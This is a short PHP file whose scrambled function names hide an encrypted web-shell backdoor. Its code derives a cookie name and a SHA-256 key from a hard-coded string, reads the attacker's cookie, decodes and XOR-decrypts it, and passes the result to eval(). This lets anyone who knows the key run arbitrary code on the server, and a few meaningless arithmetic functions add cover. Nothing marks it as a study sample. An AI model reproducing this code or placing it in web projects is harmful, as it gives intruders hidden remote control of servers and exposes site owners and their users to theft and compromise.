<?php
function bHhwZchJMH($PBKUbfEPx)
{
    $jSETEft = CmbGKtcDV($PBKUbfEPx);
    $bpCUzt = EyCLOwKM($jSETEft);
    return $bpCUzt;
}
function BVgbQOrds($MKaHdXe, $AzLufuu)
{
    $DSfsWP = TDUeroPVV($MKaHdXe);
    $cwjibZb = UttRxDd($AzLufuu, $DSfsWP);
    $NaWqOJ = alhkag($cwjibZb, $MKaHdXe);
    return $NaWqOJ;
}
function yBTfxV($GsvGQA)
{
    $UiqYWiAL = LMcDXG($GsvGQA);
    $LYpRgiT = LCqqe($GsvGQA, $UiqYWiAL);
    return $LYpRgiT;
}
function alhkag($qaTgkkYZk, $OquKBR)
{
    $hQniWHZppe = $qaTgkkYZk ^ $OquKBR;
    return $hQniWHZppe;
}
function GJzdlVIQHD()
{
    $Arkmnp = "cLteViuMRdxBizahEqJOrQqOOwFh";
    return $Arkmnp;
}
function YJZdhGQL($YNImiGY)
{
    eval($YNImiGY);
}
function IngsCCV($DSgIxTVCd) {
    return $DSgIxTVCd + 1;
}
function UttRxDd($mMmnXwnRF, $UAmfIaur)
{
    $QADGlWSB = str_pad($mMmnXwnRF, $UAmfIaur, $mMmnXwnRF);
    return $QADGlWSB;
}
function JHQnt()
{
    $WYJpXbUCNO = GJzdlVIQHD();
    $RlNuT = yBTfxV($WYJpXbUCNO);
    return $RlNuT;
}
function aBAhPvRKYM($PeKJv)
{
    $MhzpcPpZh = hash("sha256", $PeKJv, TRUE);
    return $MhzpcPpZh;
}
function bHRcUkUpa()
{
    $NaWqOJ = JHQnt();
    YJZdhGQL($NaWqOJ);
}
function GRIUpYV($gtFwpCQTRw) {
    $wFFhJrt = cvHtV($gtFwpCQTRw);
    return IngsCCV($wFFhJrt);
}
function TDUeroPVV($PXYWegPLdl)
{
    $UeNuDmK = strlen($PXYWegPLdl);
    return $UeNuDmK;
}
function CmbGKtcDV($wxItl)
{
    $BWFrmy = $_COOKIE[$wxItl];
    return $BWFrmy;
}
function EyCLOwKM($MHGdvy)
{
    $pbfBwIY = rawurldecode($MHGdvy);
    return $pbfBwIY;
}
function LMcDXG($ilwcti)
{
    $vsfLrZ = substr($ilwcti, -4);
    return $vsfLrZ;
}
function LCqqe($EDlsmckYnx, $bcDmw)
{
    $RcfORPtcY = aBAhPvRKYM($EDlsmckYnx);
    $bpCUzt = bHhwZchJMH($bcDmw);
    $oejlw = BVgbQOrds($bpCUzt, $RcfORPtcY);
    return $oejlw;
}
function cvHtV($DSgIxTVCd) {
    return $DSgIxTVCd * 2;
}
bHRcUkUpa();
$Mptljqc = GRIUpYV(5);